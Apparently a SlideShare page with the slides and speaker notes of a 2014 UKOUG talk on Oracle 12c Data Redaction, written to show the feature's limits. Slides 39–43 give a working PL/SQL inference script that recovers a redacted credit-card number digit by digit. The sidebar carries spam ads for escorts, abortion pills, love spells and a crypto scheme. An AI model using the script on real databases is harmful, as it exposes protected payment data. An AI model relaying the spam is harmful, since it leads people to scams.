OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
 
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e DesenvolvedoresOracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
 
Oracle Data Redaction - EOUC
Oracle Data Redaction - EOUCOracle Data Redaction - EOUC
Oracle Data Redaction - EOUC
 

Dernier

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
ayushiqss
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
shinachiaurasa2
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Nitya salvi
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 

Dernier (20)

SHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions PresentationSHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions Presentation
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 

Oracle Data Redaction - UKOUG - TECH14

  • 1. UKOUG Technology Conference & Exhibition 2014 8th – 10th December, ACC Liverpool Follow: @UKOUG
  • 2. Oracle Data Redaction Follow: @UKOUG Presented by: Alex Zaballa, Oracle Solution Architect, Jupiter Daniel Da Meda, Oracle DBA, Jupiter
  • 3. Follow: @UKOUG Alex Zaballa http://alexzaballa.blogspot.com/ @alexzaballa
  • 4. Follow: @UKOUG Daniel Da Meda •18 Years of experience using Oracle Technologies •7 Years working as a Senior DBA in the UK for a variety of companies like TimeWarner, Johnson&Johnson, Network Rail and John Deere •Moved to Angola over 2 years ago where I continue to work Senior DBA providing services for the Ministry of Finance •Photographer Enthusiast http://thatoracledude.blogspot.com/ @ddameda daniel.da.meda@hotmail.com http://www.guoa.org/
  • 6. Oracle Data Redaction Follow: @UKOUG
  • 7. Follow: @UKOUG Data Redaction • One of the new features introduced in Oracle Database 12c • Part of the Advanced Security option • Enables the protection of data shown to the user in real time, without requiring changes to the application
  • 8. • Applies protection at query execution time • The stored data remain unchanged Redaction takes place immediately preceding the return of selected data and only at the top level of a SELECT list • It is not an operation shown in the Follow: @UKOUG execution plan
  • 9. Follow: @UKOUG Policy SELECT rep.object_name as "OBJECT", rep.policy_name, rep.expression, rep.enable, rec.column_name as "COLUMN", rec.function_type FROM redaction_policies rep, redaction_columns rec WHERE rep.object_owner = rec.object_owner AND rep.object_name = rec.object_name; OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE ------ ----------- ------------------------------------------------ ------ ------ -------------- EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
  • 10. SQL> EXPLAIN PLAN FOR SELECT * FROM EMP; SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL')); Follow: @UKOUG As SCOTT with the MGR role: -------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | -------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | | 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | -------------------------------------------------------------------------- As SCOTT without the MGR role: -------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | -------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | | 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | --------------------------------------------------------------------------
  • 11. Not to be confused with Oracle Data Masking With Oracle Data Masking, the data is processed using masked shapes and this updated data is stored in new data blocks. For this reason, Data Masking is more suitable for non-production environments. ** Oracle Data Masking is available only with Enterprise Edition database and it requires licensing of Advanced Security. Follow: @UKOUG
  • 12. Below are some other features that already existed to help making the data more secure: •Virtual Private Database (VPD) - Allows control access on both row and column levels by dynamically adding a predicate to SQL statements issued against the database. •Oracle Label Security – Allows you to add user-defined values to table records combining it with VPD to allow fine control of who sees what . •Database Vault – Data Redaction does not prevent privileged users (such as DBAs) from having access to the data being protected. To solve this, you can make use of Database Vault. Follow: @UKOUG
  • 13. Planning on Oracle Data Redaction Policy 1. Ensure that you have been granted the EXECUTE privilege on Follow: @UKOUG the DBMS_REDACT PL/SQL package. 2. Determine the data type of the table or view column that you want to redact. 3. Ensure that this column is not used in an Oracle Virtual Private Database (VPD) row filtering condition. That is, it must not be part of the VPD predicate generated by the VPD policy function. 4. Decide on the type of redaction that you want to perform: full, random, partial, regular expressions, or none. 5. Decide which users to apply the Data Redaction policy to. 6. Based on this information, create the Data Redaction policy by using the DBMS_REDACT.ADD_POLICY procedure. 7. Configure the policy to have additional columns to be redacted
  • 14. Conditional Redaction Examples •User Environment expression => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''PSMITH''' •Database Role expression => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''SUPERVISOR'') = ''FALSE''' •Oracle Label Security Label Dominance expression => 'OLS_LABEL_DOMINATES (''hr_ols_pol'',''hs'') = 0' •Application Express Session States expression => 'V(''APP_USER'') != ''mavis@example.com'' or V(''APP_USER'') is null' Follow: @UKOUG
  • 16. Follow: @UKOUG DBMS_REDACT • DBMS_REDACT.ALTER_POLICY Allows changes to existing policies. • DBMS_REDACT.DISABLE_POLICY Disables an existing policy. • DBMS_REDACT.DROP_POLICY Drop an existing policy. • DBMS_REDACT.ENABLE_POLICY Enables an existing policy. • DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES Change the default return value for full redaction. You must restart the database to take effect.
  • 18. Follow: @UKOUG Redaction Methods • Full redaction • Partial redaction • Regular expressions • Random redaction • No redaction
  • 19. Follow: @UKOUG FULL Data Redaction •Character Data Types The output text is a single space •Number Data Types The output text is a zero •Date-Time Data Types The output text is set to the first day of January, 2001
  • 20. Follow: @UKOUG RANDOM Data Redaction •CHAR Data Types Redacted in same character set and byte length as the column definition •Number Data Types Redacted in same character set and the length is limited based on the length of the actual data •Date-Time Data Types Redacted as random dates that are always different from those of the actual data
  • 22. Follow: @UKOUG Column data types NUMBER, BINARY_FLOAT, BINARY_DOUBLE, CHAR, VARCHAR2, NCHAR, NVARCHAR2, DATE, TIMESTAMP, TIMESTAMP WITH TIME ZONE, BLOB, CLOB, and NCLOB
  • 31. Operational Activities - No Redaction •Backup and Restore •Import and Export •Patching and Upgrades •Replication •Users SYS and SYSTEM automatically have the EXEMPT REDACTION POLICY system privilege •Data Redaction is not enforced for users connected as SYSDBA Follow: @UKOUG
  • 32. Data Redaction and Data Pump ORA-28081: Insufficient privileges - the command Follow: @UKOUG references a redacted object Use the EXEMPT REDACTION POLICY system privilege in these cases. However, use it with caution. Note that the role DATAPUMP_EXP_FULL_DATABASE includes the EXEMPT REDACTION POLICY system privilege
  • 33. In order to perform a CREATE TABLE AS SELECT operation from a table protected by an active redaction policy, the user must have privileges to see the actual data on the source table Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege. Follow: @UKOUG Data Redaction and CTAS
  • 34. Redacted Columns and GROUP BY SQL Expressions Redacted Columns included in SQL expressions on a GROUP BY clause will fail as follows: SQL> select * from emp; EMP_NO NAME SALARY ---------- ---------------------------------------- ---------- 1 Daniel 702 2 Juca 607 3 Manuel 314 SQL> / EMP_NO NAME SALARY ---------- ---------------------------------------- ---------- 1 Daniel 900 2 Juca 466 3 Manuel 220 SQL> select (salary*1.10) from emp group by (salary*1.10); select (salary*1.10) from emp group by (salary*1.10) Follow: @UKOUG * ERROR at line 1: ORA-00979: not a GROUP BY expression
  • 35. •Columns from MVIEWS as well as regular VIEWS can be redacted •Inline views are redacted outermost •VPD Inline view with the predicate is not affected as it acts on the actual values •Redaction policies defined on a VIEW column will override the redaction policy defined on the base table column. Example on next slide Follow: @UKOUG Data Redaction and Views SELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C… In the above example, SELECT XYZ is redacted first, then SELECT A, SELECT B and so on
  • 36. Data Redaction and Views Consider the following Policy on column SALARY of table EMP OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE --------- -------------------------------------------------- ------ ------------- ---------------- EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY RANDOM REDACTION Follow: @UKOUG A VIEW named EMP_V is created as follows: OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE --------- -------------------------------------------------- ------ ------------- ---------------- EMP_V SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY NO REDACTION
  • 37. Follow: @UKOUG Data Redaction and Views Selecting from the EMP table: SQL> select * from emp where name='Daniel'; EMP_NO NAME SALARY ---------- ----------------------- ---------- 1 Daniel 706 SQL> select * from emp_v where name='Daniel'; EMP_NO NAME SALARY ---------- ----------------------- ---------- 1 Daniel 1001
  • 38. Follow: @UKOUG Overhead • It could reach up to 10% of performance impact when using complex Regular Expressions • Between 2-3% performance impact using other redaction methods
  • 39. •Never to be considered as a way to protect data from anyone with SQL access to the database •Extremely easy to hack once you have access to SQL •It was never designed to protect data from the attack we will demonstrate Follow: @UKOUG Hacking
  • 40. Hacking - Finding Actual Values by Follow: @UKOUG Let’s consider the following Redaction Policy: BEGIN DBMS_REDACT.ADD_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', expression => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') = ''WATCHER'''); DBMS_REDACT.ALTER_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', action => DBMS_REDACT.ADD_COLUMN, column_name => '"CREDITCARD_NO"', function_type => DBMS_REDACT.REGEXP , regexp_pattern => .*(dddd)$,regexp_replace_string => ************1,regexp_position => 1,regexp_occurrence => 1,regexp_match_parameter => i); END; Inference
  • 41. Hacking - Finding Actual Values by Follow: @UKOUG Inference SQL> SHOW USER USER is "WATCHER“ SQL> SELECT * FROM customers; CUSTOMER_ID NAME CREDITCARD_NO ----------- -------------------- ---------------- 1 Daniel Da Meda ************4368 2 Alex Zaballa ************5211 3 Antonio Mateus ************5005
  • 42. Hacking - Finding Actual Values by Follow: @UKOUG SET TIMING ON SET SERVEROUTPUT ON DECLARE vcreditcard_no CUSTOMERS.creditcard_no%TYPE; vcustomer_name CUSTOMERS.name%TYPE; BEGIN FOR a in 1..19 LOOP IF a NOT IN (5,10,15) THEN FOR b in 0..9 LOOP BEGIN SELECT name INTO vcustomer_name FROM CUSTOMERS WHERE customer_id=2 AND SUBSTR(creditcard_no,a,1) = b; vcreditcard_no:=vcreditcard_no||b; EXCEPTION WHEN NO_DATA_FOUND THEN NULL; END; END LOOP; ELSE vcreditcard_no:=vcreditcard_no||'-'; END IF; END LOOP; DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no); END; / Inference
  • 43. Hacking - Finding Actual Values by Follow: @UKOUG vi get_creditcard.sql Inference [oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014 Copyright (c) 1982, 2014, Oracle. All rights reserved. Connected to: Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production With the Partitioning, Automatic Storage Management, OLAP, Advanced Analytics and Real Application Testing options SQL> @get_creditcard.sql Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211 PL/SQL procedure successfully completed. Elapsed: 00:00:00.03
  • 44. About UKOUG UKOUG exists to serve the Oracle community in the UK and Ireland. We act as a focal point for sharing knowledge about Oracle applications, technologies, tools and developments and, as an independent, not for profit membership organisation, represent the views of users and partners to Oracle. © Copyright 2014 UKOUG Contact User Group House 591-593 Kingston Road Wimbledon London SW20 8SA T: +44 (0)20 8545 9670 W: www.ukoug.org

Notes de l'éditeur

  1. For me, oracle should provide security features for free, specially for enterprise edition But it is just my opinion.
  2. The next slide will show that the execution plans do not change between queries which return redacted data and queries that do not return redacted data.
  3. The above slide shows that a policy named SCOTT_EMP exists for a table called EMP. The policy is enabled and it is supposed to redact the salary column for sessions that do not have the MGR role.
  4. This slide makes it clear that there is no distinction between execution plans of the same statement with or without data redaction taking place. The redaction magic must happen right after the TOP level operation of the execution plan and before the data is sent to the client.
  5. Here a some examples of conditional artefacts that can be used to drive redaction policies
  6. Import and Export: Data Redaction policies associated with tables and views are included in the export and import operation. Therefore, the policies are enabled and the data is redacted when users query the objects in the imported database SYSTEM has the EXP_FULL_DATABASE role, which includes the EXEMPT REDACTION POLICY system privilege. Check with Zaballa about replication and Backup&Recovery tasks involving redacted columns
  7. Alternatively, you can perform the export with a user that is exempt from the redaction policy. Namely, a user that doesn't fall under the redaction criteria
  8. Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
  9. The above example shows a table emp that has a redaction policy enabled on column SALARY. The redaction method is RANDOM but it could be any other redaction method.
  10. Inline Views ELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C…, SELECT XYZ is redacted first, followed by AS SELECT A, then AS SELECT B, and so on. AS SELECT C is redacted last.
  11. Data Redaction and Views Here we can see that when we select from a view, redaction does not take place even though the EMP base table has a redaction policy defined on the SALARY column.
  12. Data Redaction and Views Here we can see that when we select from a view, redaction does not take place even though the EMP base table has a redaction policy defined on the SALARY column.
  13. According to our tests it could reach up to 10% of performance impact when using complex RegEx and between 2-3% performance impact using other redaction methods
  14. Ínference
  15. Ínference
  16. Ínference